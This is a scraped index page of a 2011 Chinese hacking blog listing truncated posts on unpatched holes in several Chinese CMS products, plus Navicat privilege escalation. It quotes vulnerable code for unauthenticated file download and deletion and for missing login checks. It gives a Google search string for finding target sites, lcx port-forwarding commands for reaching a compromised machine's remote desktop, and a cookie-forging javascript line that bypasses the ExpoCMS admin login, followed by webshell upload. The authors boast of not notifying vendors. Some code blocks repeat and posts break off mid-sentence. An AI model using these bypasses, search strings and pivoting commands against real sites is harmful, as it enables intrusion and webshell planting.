以下版本没测试 测试的是最新版本
在公布前几小时没有通知官方 ^_^ 哈哈
为什么说过程精彩呢? 看完就明白!
因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!!
经典对白 看代码
后台登录文件
admin\Modules\Auth\Index.php
++Coo[......]
首页 »
技术文章
EXCMS 0day
作者: admin | 发布时间: 周二, 01/18/2011 - 14:41ESPCMS 0day
作者: admin | 发布时间: 周二, 01/18/2011 - 14:39以下版本没测试 测试的是最新版本
google: Powered by ESPCMS
过程有点复杂 耐心看就明白
看代码
adminsoft\control 里面的文件都是后台运行文件
每个文件开头都带有 $this->softbase(true)
用于载入基本数据
看
++[......]
利用navicat提权
作者: admin | 发布时间: 周二, 01/18/2011 - 14:34navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到
有两个方法提权:
1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs[......]
第一条和第三配合使用。
如在本机上监听 lcx -listen 51 3389,
在肉鸡上运行 lcx -slave 本机ip 51 肉鸡ip 3389
那么本地连127.0.0.1就可以连肉鸡的3389.
第二条是本机转向。如-tran 51 127.0.0.1 3389
之前别人说的上传漏洞上网到处有了 结果官方发布了一个补丁包
官方补丁包说明
美易企业内容管理系统出现上传漏洞,会导致非管理员上传asp/aspx/cer扩展名文件,如果使用的php空间,支持这类文件则会受到攻击。
版本:美易4.0、4.1
请将相应文件覆盖
manage/upload.[......]
科威网址导航任意下载删除文件漏洞
作者: admin | 发布时间: 周日, 01/16/2011 - 14:35垃圾导航程序 内核盗用别人程序还拿去卖钱。。。
文件 admin\ad_data.php
备份还原数据库功能
没有进行管理登录验证
经典对白。。 看代码 ….
case 'down':
$filename or message('文件名不能为空');
file_down('../data/'.$filename);
break;
case 'delete':
unlink("../data/{$_GET['filenames']}");
message("文件<strong>{$_GET['filenames']}</strong>删除成功");
break;
$filename or message('文件名不能为空');
file_down('../data/'.$filename);
break;
case 'delete':
unlink("../data/{$_GET['filenames']}");
message("文件<strong>{$_GET['filenames']}</strong>删除成功");
break;
http://127.0.0.1/admin/ad_data.php?ac[......]
野草weedcms 5.0写马漏洞
作者: admin | 发布时间: 周日, 01/16/2011 - 14:31问题文件在 includes/admin_config.php
这个程序登录验证是一个对每个方法来验证登录 而不是对整个文件来验证
还是那句。。 看代码
if($do=='template_edit'){
$file=empty($_GET['file'])?'':trim($_GET['file']);
if(get_ext($file)!='html'&&get_ext($file)!='css'){
exit('对不起,参数非法!');
}
$content=file_get_contents('templates/'.$config['site_template'].'/'.$file);
$smarty=new smarty();smarty_header();
$smarty->assign('file',$file);
$smarty->assign('content',$content);
$smarty->display('template_info.htm');
}
$file=empty($_GET['file'])?'':trim($_GET['file']);
if(get_ext($file)!='html'&&get_ext($file)!='css'){
exit('对不起,参数非法!');
}
$content=file_get_contents('templates/'.$config['site_template'].'/'.$file);
$smarty=new smarty();smarty_header();
$smarty->assign('file',$file);
$smarty->assign('content',$content);
$smarty->display('template_info.htm');
}
文件开头的方法每个IF后都验证一次 最后2个没有 估计这2个功能是后期加上去 可能当时作者的老人痴呆[......]
野草Weedcms v4.0 sp1 至最新5.0贺岁版 USER_AGENT盲注漏洞【附EXP】
作者: admin | 发布时间: 周日, 01/16/2011 - 14:29程序说明:
基于PHP+MYSQL架构。
创新型内容管理模式,建立频道后可定义内容模型,均在后台可以控制,非常方便。
模板引擎采用了成熟稳定的Smarty引擎,很轻松就可以做出模板界面来。
前台和后台均采用了DIV+CSS,速度比传统型略快。
JS采用了国际上比较流行的Jquery框架,还[......]
ECshop 支付方式注射 0day
作者: admin | 发布时间: 周日, 01/16/2011 - 14:19ECshop 支付方式注射
发布日期:2011.1.5
挖掘作者:fjhgx(俺是农村的)
联系方式:bugtosafe@gmail.com
漏洞文件:lib_payment.php
漏洞函数:get_order_id_by_sn($order_sn, $voucher = ‘fals[......]
ExpoCMS后台验证漏洞
作者: admin | 发布时间: 周日, 01/16/2011 - 14:17/admin/CheckLogin.asp
<%
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
Session.CodePage = 65001
Response.Charset = "UTF-8"
UserName=Request.Cookies("CNVP_CMS2")("UserName") '在cookie中取username值
If UserName="" Then
Response.Redirect("Admin_Login.asp") '如果为空,就跳转
Response.End()
End If
%>
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
Session.CodePage = 65001
Response.Charset = "UTF-8"
UserName=Request.Cookies("CNVP_CMS2")("UserName") '在cookie中取username值
If UserName="" Then
Response.Redirect("Admin_Login.asp") '如果为空,就跳转
Response.End()
End If
%>
exp:
javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin")
这样就能进后台了 /admin/Admin_Index.asp
后台有个上传的地方可以拿webshell